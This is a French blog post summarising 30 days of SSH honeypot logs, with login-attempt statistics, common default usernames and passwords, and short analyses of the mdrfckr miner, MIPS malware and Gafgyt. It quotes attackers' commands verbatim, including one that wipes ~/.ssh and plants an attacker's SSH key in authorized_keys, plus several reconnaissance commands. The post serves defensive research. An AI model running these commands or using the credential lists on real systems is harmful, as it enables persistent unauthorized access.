Ce que vous obtenez après 30 jours avec un honeypot SSH

Qu’est-ce qu’un honeypot ?

Un honeypot détecte et enregistre les attaques lorsqu’un attaquant tente de pénétrer dans un système. Le honeypot dont nous allons parler ici est un honeypot SSH.

Pourquoi ?

Aucune idée, je l’ai juste fait pour des recherches et pour ma satisfaction personnelle…

Environnement

OS : Ubuntu 24.04 LTS x86_64 
Noyau : 6.8.0-31-generic

Tentatives de connexion

cat X.log | grep -c "login attempt"
11599

Il y a eu un total de 11 599 tentatives de connexion. Divisé par 30 jours, cela signifie une moyenne de 386 tentatives de connexion par jour.

Noms d’utilisateurs utilisés

cat X.log | grep -a "login attempt" | awk '{print $5}' | awk -F "'" '{print $2}' | sort | uniq -c | sort -nr | head
   8181 root
    977 345gs5662d34
    359 admin
    198 pi
    105 0
     71 ubuntu
     51 ubnt
     46 support
     37 user
     30 oracle

Comme prévu, de nombreuses attaques ciblent des noms d’utilisateurs habituels et par défaut.

Pour l’utilisateur 345gs5662d34, selon les recherches de l’Université d’Aalborg au Danemark, il pourrait s’agir des identifiants par défaut d’un téléphone IP Polycom CX600.

Vérifiez ici :
SweetCam : un honeypot de caméra IP

Mots de passe

cat X.log | grep -a "login attempt" | awk '{print $5}' | awk -F "'" '{print $4}' | sort | uniq -c | sort -nr | head
    977 345gs5662d34
    967 3245gs5662d34
    246 admin
    239 123456
    208 password
    155 0
     88 root
     75 raspberry
     73 123
     66 raspberryraspberry993311

Une fois de plus, on retrouve le même que le nom d’utilisateur par défaut pour le téléphone IP Polycom CX600.

Commandes exécutées après connexion

cat X.log | grep -a "CMD" | awk -F'CMD: ' '{print $2}' | sort | uniq -c | sort -nr
   6775 echo -e "\x6F\x6B"
   1016 cd ~; chattr -ia .ssh; lockr -ia .ssh
   1016 cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
    320 uname -s -v -n -r -m
    112 ./oinasf; dd if=/proc/self/exe bs=22 count=1 || while read i; do echo $i; done < /proc/self/exe || cat /proc/self/exe;
     87 uname -a
     29 ps | grep '[Mm]iner'
     29 ps -ef | grep '[Mm]iner'
     29 ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/ /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/
     29 ifconfig
     29 echo Hi | cat -n
     29 cat /proc/cpuinfo
     29 /ip cloud print
     23 whoami
     23 which ls
     23 w
     23 uname -m
     23 uname
     23 top
     23 lscpu | grep Model
     23 ls -lh $(which ls)
     23 free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
     23 df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
     23 crontab -l
     23 cat /proc/cpuinfo | grep name | wc -l
     23 cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
     23 cat /proc/cpuinfo | grep model | grep name | wc -l

Voici maintenant la partie intéressante.

Le script oinasf

L’exécution d’un script mystérieux, ./oinasf, suivie de tentatives de lecture et d’affichage du contenu exécutable du système, indique une stratégie de sondage pour détecter des vulnérabilités ou des informations précieuses. L’utilisation de /ip cloud print suggère que des bots ciblent les routeurs MikroTik pour accéder ou perturber des services basés sur le cloud, tandis que uname -s -m leur fournit des informations essentielles sur le système d’exploitation et l’architecture matérielle, utiles pour élaborer des actions ultérieures adaptées aux spécificités du système. En conclusion, ces commandes représentent une stratégie claire pour infiltrer, évaluer et établir un contrôle sur les systèmes ciblés. Elles soulignent la préférence des bots pour la manipulation directe et un accès durable, mettant en évidence le besoin critique de défenses robustes contre ces tactiques courantes mais potentiellement dévastatrices.

Le crypto-mineur mdrfckr

Ce mineur crée simplement une tâche cron qui supprime tout dans le dossier .ssh, ajoute une unique clé ssh et verrouille l’accès aux autres utilisateurs.

Ensuite, il tue les autres mineurs s’ils existent pour avoir le champ libre.

Vous pouvez consulter ce dépôt de quelqu’un qui a déjà été piraté et où ce mineur a été utilisé sur son serveur : Dump of the crypto-miner that got installed on my system - Github

Le malware MIPS

Probablement un autre malware d’architecture MIPS (Multiprocesseur sans étapes de pipeline interbloquées), ciblant les routeurs et appareils IoT.

Voici une bonne lecture et analyse du comportement d’un malware MIPS :
Analyzing a Backdoor/Bot for the MIPS Platform

Le script Sakura.sh

Ce script fait partie du malware Gafgyt.

Gafgyt, aussi connu sous le nom BASHLITE, est un botnet affectant les appareils Internet des Objets (IoT) et les systèmes basés sur Linux. Le malware vise à compromettre et prendre le contrôle de ces appareils, souvent en exploitant des mots de passe faibles ou par défaut, ainsi que des vulnérabilités connues. Gafgyt existe depuis 2014 et a évolué en plusieurs variantes, chacune avec ses propres fonctionnalités et capacités, y compris la capacité de lancer des attaques par déni de service distribué (DDoS).

Voici une analyse détaillée du malware Gafgyt ciblant les appareils IoT